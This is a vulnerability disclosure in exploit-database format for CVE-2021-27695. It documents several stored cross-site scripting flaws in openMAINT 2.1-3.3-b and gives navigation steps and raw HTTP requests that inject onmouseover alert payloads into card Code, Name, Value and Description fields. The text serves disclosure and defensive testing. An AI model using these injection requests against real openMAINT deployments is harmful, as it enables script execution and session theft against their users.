# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting
# Date: 13/03/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.openmaint.org/
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
# Version: 2.1-3.3
# Tested on: Linux
# CVE: CVE-2021-27695
Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters.
Proof of concepts :
1-Login to you'r Dashboard As a low privilege user
2-Click On Facilities and assets - Location - Sites
3- +Add card Building
4- Code and name parameters both are vulnerable
POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
.....
Cookie: ...
{"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....}
The Xss will trigger in that form, and also if you click on "Map" button , the xss will trigger there
------------------------------------------------------------------------
Another Xss :
1-Like above in Facilities click on Locations and click on complex
2-click + Add card Complex
3-insert javascript payload to Code And Name
POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
....
Connection: close
Referer:
Cookie: ....
{"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...}
4-Save it
5-Back to Sites and click on previous card
6- in position section click on "Complex" drop down
7- xss will trigger
------------------------------------------------------------------------
Another Xss:
1-Like exmaples above go to Locations and click on Sites
2-Add Card Building or click the one you created before
3-in left menu click on "Relations"
4-click "Add relations" and select one of the options
5- Add Card and select one of the options
6- insert javascript payload to code and name parameter
POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Connection: close
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578
{"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... }
7- save it and close the form
8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list
9- xss payload will trigger
------------------------------------------------------
Another Xss:
1- In "Navigation" Bar click on "Configurations"
2- Click on parameter
3- + Add card Parameter
4- Insert javascript payload to Code and Value
PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578
{"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....}
save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger
-------------------------------------------------------
Another Xss:
1-Click Facilities and assets
2-Locations
3-Select one of cards
4-Click "Add Card"
5-in "Attachments" tab click "Add attachment" select "Document" or "image"
6-insert javascript payload in "Code" and "Description"
PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
CMDBuild-ActionId: class.card.attachments.open
CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8
Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543
Content-Length: 1020
Connection: close
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578
-----------------------------1049383330380851725139941543
Content-Disposition: form-data; name="attachment"; filename="blob"
Content-Type: application/json
{"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...}
-----------------------------1049383330380851725139941543--
7-save it and xss will trigger